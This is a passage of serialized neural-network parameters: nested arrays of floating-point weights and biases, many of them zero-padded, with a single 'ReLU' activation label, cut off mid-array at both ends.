-0.002163, -0.01636, -0.002726, -0.00233, -0.04565, 0.0397, 0.037, -0.04382, -0.0308, -0.03113, 0.004597, -0.0223, -0.0466, -0.04105, 0.001149, -0.02751, 0.02017, 0.0174, -0.013565, -0.04218, 0.03546, -0.0467, -0.02303, 0.01857, -0.00594, -0.04324], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0394, 0.5513, -0.0374, 2.127, 0.0327, -0.00554, 0.132, 1.448, 0.3982, 1.159, -0.0985, -0.2103, 0.0355, 0.01113, 0.0402, 0.06714, -0.06696, -0.197, -0.1079, 0.1159, 0.1934, -0.1864, -0.01418, -0.10925, -0.0004625, 0.408, 0.2072, 0.01204, -0.0833, 0.02568, -3.828, -0.0571, 1.004, 2.088, -1.691, 0.03738, 0.048, 0.05368, 2.582, -0.01787, -0.1262, -0.04697, -0.02089, 0.646, 0.0435, 0.6523, 0.01881, 0.1348, 1.721, -0.094], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5444, 0.0612, -0.1003, -0.4167, 0.03864, -0.1431, 0.2052, -0.2028, -0.1437, 0.7227, -0.2727, 0.05664, -0.465, -0.05576, -0.935, -0.4873, 0.06604, -1.146, 0.752, 0.7764, 0.9995, 0.4153, -0.02591, 0.1743, 0.01086, -0.0581, -0.0899, -0.2102, -0.6494, -0.443, 0.0841, 0.0259, 0.2617, 0.4336, -0.3186, -0.6494, 0.693, -0.1593, 0.8413, 0.0956, -0.2898, -0.251, -1.686, 0.1528, 0.315, 0.5034, -0.09607, -0.5625, 0.6016, -0.005093], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06726, -0.479, 0.8345, -0.2727, 0.1208, -2.352, 0.406, -0.927, 0.4697, 0.1746, 0.04007, 0.2964, -0.2394, 1.197, 0.1145, 0.11884, -0.727, -0.3845, -0.631, -0.8022, -1.883, 1.51, -0.628, 0.312, 0.00842, -0.747, 0.2429, -0.4175, -0.06274, 0.435, -0.4355, 1.011, 1.165, -0.4817, 0.03937, -0.436, 0.04407, -0.846, 0.4954, 0.2151, 0.02385, -0.2015, -2.215, -0.3037, 0.6353, -0.2303, 0.7046, 0.817, 1.369, 0.04977], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9287, -0.0805, 0.064, -0.263, 0.1661, -1.662, -0.1321, -1.327, 0.1661, -0.1299, -0.3345, 0.0661, 0.633, 0.03796, -0.387, -0.0128, 1.013, -0.3848, 0.007504, 0.484, -0.03001, 0.971, -0.5166, -1.186e-05, -0.02399, -0.0991, -0.4517, -0.509, 0.087, -1.372, -0.0566, 0.8457, -0.02489, 0.07526, 0.2832, 0.05038, -0.6357, -0.634, -0.4631, 0.3662, -0.4436, -0.3032, -0.4553, -0.4375, 0.478, 0.4346, -0.1278, -1.309, 0.1761, 0.1035], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0877, -0.03946, 0.0651, 1.975, -0.2476, -0.1782, 0.3708, 0.4385, -0.05276, 0.0939, -1.622, 0.3723, 0.653, -0.3389, 0.685, -0.04672, 0.09357, -0.502, -0.0821, 0.1796, 0.103, 0.0365, -0.1941, 0.534, -0.02518, -0.7637, 0.1166, -0.6436, -0.01732, 0.6904, -0.685, -0.2406, 0.4167, 2.451, -1.056, 0.3062, 0.125, 0.2166, 2.457, -0.0457, -1.418, 0.3894, -0.467, 0.3018, 0.8584, 0.902, -0.4275, 0.684, 0.011894, -0.2035], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.137, 0.0095, -0.1389, 0.0145, 0.02005, -0.2408, -0.1231, 0.03253, 0.07886, 0.02043, -0.1368, -0.0575, 0.010185, 0.076, -0.1461, -0.091, 0.05734, -0.0659, 0.148, 0.0703, -0.06616, 0.1056, -0.07556, -0.08484, -0.004753, 0.06604, 0.07837, -0.0748, -0.1364, 0.04358, -0.1473, 0.0637, 0.09174, 0.001616, -0.11285, -0.1444, -0.05746, 0.06995, 0.05936, -0.1691, -0.0949, -0.03038, -0.0645, 0.05365, 0.03683, 0.0619, 0.0667, 0.0957, 0.0668, -0.1161], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.47, 0.409, 0.1854, 0.8687, -0.9478, -8.58, -3.508, 1.141, 0.05185, 0.314, 0.4312, 1.846, 0.2448, -0.01799, -0.1121, 1.099, 0.4792, -0.4324, 1.704, -0.6865, -0.2695, -0.3308, -0.6587, -0.2246, 0.02043, 0.5215, 0.914, 0.791, -0.733, 0.1017, -0.6235, -0.7173, 0.7275, -0.729, -1.798, 1.084, 0.6665, 0.0766, 0.1866, -0.1714, 0.6216, -0.359, 0.2822, -0.1371, -0.2101, 0.3608, 0.4004, 0.4377, 0.8843, -1.522], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5176, -0.1888, -0.11066, 0.6104, 0.3577, 1.109, 0.2131, 0.1383, -0.598, 0.03333, -0.2864, 0.04092, -0.8965, 0.5635, 0.10547, -1.185, -1.164, 0.4424, -1.358, 0.599, -0.0404, 1.982, -2.904, 0.6235, 0.00987, 0.4912, -0.393, 0.3945, -0.5093, -1.072, 0.04565, -0.4905, -0.3572, -0.4294, 0.1699, 0.1533, 0.3533, 0.9766, -0.6934, -0.7236, -0.2329, 0.09094, 0.5225, -0.4993, -0.4392, -0.1796, 0.507, 0.4465, 0.09717, -0.423], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.165, -0.0834, 0.2424, 0.8506, -0.4795, 0.5825, 0.983, 1.079, 0.727, 0.5293, -0.4185, -0.781, 0.3652, 0.7173, 0.2656, -0.0855, -0.06247, -0.0434, -0.4746, 0.2637, 0.03668, 1.055, -0.1847, 0.3425, -0.00714, 0.7954, 1.195, 0.5415, 0.61, 0.1735, -2.576, -1.212, 1.015, 1.157, -1.408, 0.8105, 0.13, 0.5327, 2.041, 0.1376, -0.1647, -0.5303, 0.226, 0.653, -0.1655, 0.6865, 0.1997, 0.821, 1.698, -0.9243], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3967, -0.0966, 0.525, 0.2903, -0.1411, -1.892, -1.61, 0.125, -0.4607, 0.99, 0.1499, -0.4036, -0.2087, -0.396, -1.325, -0.2297, -0.786, 0.12024, -0.475, 0.598, -2.383, 1.427, 0.2474, -0.1412, -0.0269, 0.271, -0.9507, -0.488, 0.7896, -0.006252, -0.12317, 0.1101, -0.1703, 0.4734, -0.05673, -0.1989, -0.04135, 0.3357, 0.2296, -0.1056, -0.3425, 0.098, -0.7324, 0.06094, 0.605, 0.581, -1.763, -0.742, -0.1697, -0.5815], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.245, 0.5625, 0.26, -0.2362, -0.368, -0.2268, 0.2391, 0.6636, -0.859, -0.828, -0.115, 0.453, -0.02382, 0.4822, 0.825, 0.1614, -0.0338, 0.5684, -1.883, 0.745, -0.011955, -1.048, 1.101, 0.3318, -0.0345, 0.2386, 0.01531, 0.1145, 0.3547, 0.4534, -0.166, -0.7104, -0.6567, -0.2078, -0.262, 0.3242, -0.0729, 0.726, -0.04553, -1.27, -0.633, 0.4175, 1.438, -0.3904, -0.006542, -1.009, 0.05093, 0.6465, -0.1598, -0.2311], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3486, 0.09894, 0.1764, 1.004, 0.217, 0.2446, 0.0575, 0.567, -0.3484, 2.129, 0.2622, -0.5176, -0.1124, -0.309, 0.1196, 0.284, 0.3794, 0.09094, -0.02074, 0.667, 0.2886, -0.04617, -0.1569, 0.04303, -0.02356, 0.368, 0.04013, 0.2134, 0.02914, 0.1919, -0.3804, 0.0649, 0.1403, 1.386, -0.3875, -0.4346, -0.0982, -0.6133, 0.617, 0.172, -0.266, 0.04846, 0.331, 0.3218, 0.507, 0.8955, -0.1508, -0.6025, -0.1422, 0.161]]
[0.08355, -0.0213261, 0.756291, -1.25082, 0.178469, -0.339158, 0.109226, -1.26214, -0.356488, -0.00829379, -0.0201183, -0.192039, -0.0892578, -0.206319, 0.105053, -0.0932226, -0.245924, 0.159416, 0.465794, -0.760039, 0.127213, 0.393189, -0.0717872, 0.319831, -0.0141183, -0.00660377, -0.703714, 0.440894, -0.403874, -0.550258, -1.33355, -1.11956, -0.731673, 0.237415, -0.827488, 0.317529, -0.741801, -0.0174412, -0.302206, -0.0996994, 0.655079, 1.25241, 0.0390987, -0.0242382, -0.385696, -0.359071, -0.155856, 0.0285971, -0.426623, 0.780925, 0.08356, -0.02133, 0.7563, -1.251, 0.1785, -0.339, 0.10925, -1.262, -0.3564, -0.00829, -0.02011, -0.192, -0.08923, -0.2063, 0.10504, -0.0932, -0.246, 0.1594, 0.4658, -0.7603, 0.1272, 0.3933, -0.0718, 0.3198, -0.01412, -0.006603, -0.7036, 0.441, -0.4038, -0.5503, -1.334, -1.119, -0.7314, 0.2374, -0.8276, 0.3176, -0.7417, -0.01744, -0.3022, -0.0997, 0.6553, 1.252, 0.0391, -0.02423, -0.3857, -0.3591, -0.1559, 0.0286, -0.4265, 0.781]
ReLU
[[0.146062, -0.00549069, 0.793907, 1.30888, 0.224081, -1.3641, -0.109635, 0.898539, 0.310022, 0.00682475, -0.00362062, 0.149834, -0.235071, 0.15789, -0.00178135, 0.48472, 0.323807, -0.598065, -0.491531, 0.324435, -0.668401, 0.304915, 0.419003, 0.298746, 0.0234912, 0.00549653, -0.179487, -1.50386, 0.0308066, 0.337636, 0.340796, 1.64739, 0.0150481, 0.33905, 0.395486, -0.785359, -0.633538, -0.038462, -3.22461, 0.624705, -0.880133, -1.00503, -0.520676, 0.0333464, 0.496559, 0.113749, -1.1159, -1.15657, 0.515279, -0.132622, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.159, -0.00827789, -0.478648, -0.485165, 1.43533, 1.08912, 0.348308, -4.84346, 0.0427388, 0.370465, -0.0192723, -0.673709, 0.160745, 0.650405, 0.856348, 0.037164, 0.0255892, -0.26288, -1.08544, -0.36311, -1.62061, -0.789267, 0.373978, -0.978965, 0.0276093, 0.0313649, 0.536809, -1.1492, -0.0940774, -0.0333346, -0.257751, 1.9695, 0.0501485, 0.0733369, -0.866354, 0.779935, 0.760352, -0.0217517, -2.00374, -0.801014, 0.214337, 1.1548, -0.967842, 0.0254242, 0.158038, -0.184218, -0.0593141, -2.33211, -0.517898, -0.317556, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.01583, 0.0282395, 0.111866, -0.52413, 0.373136, -0.0115599, -0.116923, -0.787078, -0.154454, 0.0678869, -0.00353034, 0.263966, -0.0961603, 0.54468, 0.148624, 0.115876, -0.0490365, -0.646944, 0.801084, -0.102975, 0.647824, 0.210518, 0.0134414, 0.0718505, 0.0419941, -0.00286356, -1.88786, -0.509127, 0.396081, 0.235139, -0.234269, -0.594599, -0.0888495, 0.663104, -0.110467, -0.633579, -0.740803, 0.0317191, 0.129543, 0.361322, -0.100759, -0.503037, -0.197447, 0.00101419, 0.236294, 0.312905, -0.351823, 0.0769389, -0.490059, -0.305079, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.17155, 0.028289, 0.00477124, 0.0251563, 0.562535, -0.0817147, 1.07524, -0.149315, 0.333289, -0.267687, 0.0251055, 0.0681931, -0.069401, 0.354327, -0.132719, 0.193532, 0.0164038, -0.262618, 0.427665, -0.274604, -0.526276, 0.369284, 0.287887, -0.181297, -0.0281393, -0.00309896, 0.0811781, 0.771188, 0.26736, -0.177761, 0.151055, -0.683415, 0.347794, 0.67458, 1.04303, -0.0356357, 0.25417, -0.0400246, 1.76959, 0.231712, -0.0273251, 0.116641, 0.376222, 0.0395626, 0.362095, -0.135576, 0.186865, -0.363663, -0.19285, -0.304186, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.955485, 0.0254362, 1.0283, -0.371288, 0.374185, -0.467278, -0.356728, -0.0264583, -0.161747, 0.501191, 0.0511949, -0.132808, -0.72633, -0.693849, 0.769499, -0.0407224, 0.0251933, 0.00979278, -0.532192, -0.257975, -1.66326, -1.15386, 0.195759, -0.442527, 0.041454, 0.0496907, 0.968233, -0.819594, -0.515786, 0.503378, 0.53412, -1.93176, 0.546852, 0.217526, 0.0159655, 0.695426, -0.42943, 0.0447726, -0.0976005, 0.380133, 0.0274513, -0.80861, 1.04804, -0.0053091, 0.272228, 0.817947, 0.977107, 0.137715, -0.636124, -0.501804, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.20828, -0.0303847, 0.436792, 0.335091, -0.173446, 0.410784, 0.369784, -0.309007, -0.360549, -0.0524694, 0.0112505, -0.791586, 0.635683, -0.73322, 1.06559, 1.06831, -0.283025, 1.8709, -1.04886, 0.504083, -0.293927, 0.190397, 0.71305, 0.0126695, 0.0116692, -0.00702797, 0.224872, -0.904221, -0.625775, -0.143618, -0.147374, 1.06813, 0.556923, -0.21455, 0.135698, -2.6186, 0.118405, 0.0145899, 1.47995, 0.565217, 0.450213, -0.972123, 0.701766, -0.00156905, 0.546697, 0.484728, -0.690185, -0.592518, 0.140418, -0.636279, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.422953, 0.0222066, 0.338828, 1.27635, -0.9927, 1.86136, -0.255366, 0.235268, -0.644658, -0.228869, -0.00860178, 0.494966, 0.712184, -0.0216503, 0.173294, 0.44122, -0.412607, 1.11625, -0.842493, 0.496495, -0.657396, 0.217746, -5.25635, 0.0585211, 0.0364919, -0.0127628, -0.518883, -0.113222, 0.203969, -0.507175, 0.999772, 0.459076, -0.351577, -0.237441, -0.2159, -0.456683, 0.279574, -0.0187747, -0.0689664, -0.471874, -0.409932, 0.449981, -0.302601, -0.0475218, -0.712586, 0.110293, -1.63186, 0.151175, 0.741153, -0.130518, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.799142, 0.00816988, 0.0553741, -0.559372, 0.400247, 0.317241, 0.11991, -0.0809255, -0.41687, 0.319947, 0.0216162, 0.0765637, 0.478367, 0.118377, -0.0137534, 0.0871742, -0.222959, 0.12121, 0.516931, -0.146308, 0.491406, 0.512597, 0.0623626, 0.162539, 0.0129173, 0.0106943, 1.17349, -0.946097, -0.517743, -0.228096, -0.204102, -2.01319, 0.231522, 0.33731, 0.51374, -0.290217, 0.0242341, 0.0342037, -2.1485, 0.628177, 0.0631272, 0.707556, -0.265911, 0.00990055, 0.0868733, -0.129735, 0.3949, -0.207967, 0.0195495, 0.427805, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.00733, -0.012773, -0.232578, 0.159315, 0.0390867, 0.619946, 0.509541, 0.307073, 0.160823, -0.146549, 0.0248556, 0.0796208, 0.614687, 0.353465, 0.00746948, -0.593243, -0.52853, -0.200885, -0.441188, 0.0406136, -0.382636, -0.407389, 0.0213565, 0.500072, 0.0136711, 0.00512252, 0.38901, -0.171396, -0.179847, -0.260451, 0.169223, -0.00899478, 0.43993, 0.509578, 0.392761, 0.106603, -0.394178, 0.00815187, -0.188212, -0.266459, 0.498582, 0.273241, 0.395952, 0.0477267, 0.404917, 0.0280034, 0.354442, 1.04364, 0.201704, 0.0153662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.736684, -0.0349476, -0.593136, -0.66023, -0.0605671, 0.179066, 0.0228669, -0.724873, -0.99508, 0.19662, -0.0382987, -0.535398, -1.70078, -0.317144, -0.650313, 0.694423, 0.232435, -0.399975, -0.0130644, -0.18234, -0.142796, 0.692194, -0.24351, -0.286019, 0.0267213, -0.0311121, -0.268437, -0.822044, 0.373082, -0.751817, -0.117626, -0.279496, -0.198716, 0.779035, -0.351806, 0.472195, -1.0053, 0.0489097, -0.211348, 0.765523, 0.15306, -0.0026115, -0.0146425, -0.0432454, 0.199387, -0.0137113, 0.970794, -12.3406, 0.00754137, 0.0891815, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.145289, 0.0185443, 0.392431, 0.683524, -0.167875, 0.617611, -0.261705, 0.165697, 0.122478, -0.408404, 0.0265899, 0.251481, 1.00811, -0.162485, -0.0393967, 0.548562, -0.101927, -0.421665, 0.0293742, 0.115174, 0.193213, 0.285337, 0.223236, 0.15347, 0.053773, -0.0383626, -0.301958, -0.174012, 0.29887, 0.15822, 0.387716, -8.84214, -0.497444, 0.134055, 0.0349669, 0.0324018, -0.312263, 0.00453832, -0.380591, 0.094851, -0.335861, -0.706575, 0.0620854, 0.025002, -0.100599, -0.445625, 0.0191583, 1.21613, 0.260189, -0.123328, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0586311, -0.0325541, 0.0212813, -0.127002, 0.24877, 0.259232, 0.206535, 0.253648, 0.0273293, -0.038966, 0.0327889, -0.0373718, 0.459418, 0.310978, 0.121522, -0.219244, -0.103901, -0.41725, 0.284548, 0.0570689, 0.050928, -0.119908, -0.123251, 0.0970952, 0.0140834, -0.00153388, -0.00955284, 1.74559, 0.0305404, 0.0925489, -0.110095, 0.440722, -0.170389, 0.115845, -0.130184, 0.222611, -0.25162, -0.0369903, 5.87174, -0.253637, 0.107282, 0.0209906, 0.310117, 0.0142127, 0.299072, 0.21315, 0.385674, 0.31147, 0.00250381, 0.490902, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.898132, 0.00309214, 0.192508, 0.855317, -0.76274, -0.108065, 0.108849, 0.731708, -0.999004, 0.291265, 0.00358668, -0.00489437, 1.02984, -0.189973, 1.10379, 0.298759, 0.364115, -0.159853, -0.390424, 0.357379, -0.771181, 0.42805, -0.0966753, 0.334153, -0.0503492, 0.0302441, -0.12224, -0.00263457, 0.415853, -0.063717, 0.161621, -0.394565, -0.458226, 0.0149316, 0.766441, -0.883442, 0.972034, 0.0116764, -0.0778877, 1.24059, -1.17544, -0.0264858, -0.26949, -0.0126421, -0.263898, -0.954828, 0.790132, -6.49859, 0.356417, -0.902285, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.203191, 0.0354445, -0.135743, 1.72597, -0.560661, 1.44559, -0.314939, -0.818213, -0.569982, -0.313603, -0.000582217, -0.0649615, 0.26685, 0.468704, 0.00154891, 0.267696, -0.39484, -0.138025, -0.613058, 0.233437, 0.245356, -0.0398625, -0.588535, -0.38503, -0.0287808, 0.0347579, 1.3458, 0.139366, 0.271717, -0.118868, 0.462311, -1.07635, 0.627303, 0.875428, 0.189252, -0.064001, 0.618753, 0.0444535, -0.893462, -0.377205, 0.499965, 0.253536, -1.07397, 0.0369999, -0.308284, 0.0194815, -0.497418, -0.794475, -0.499362, -0.0333678, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 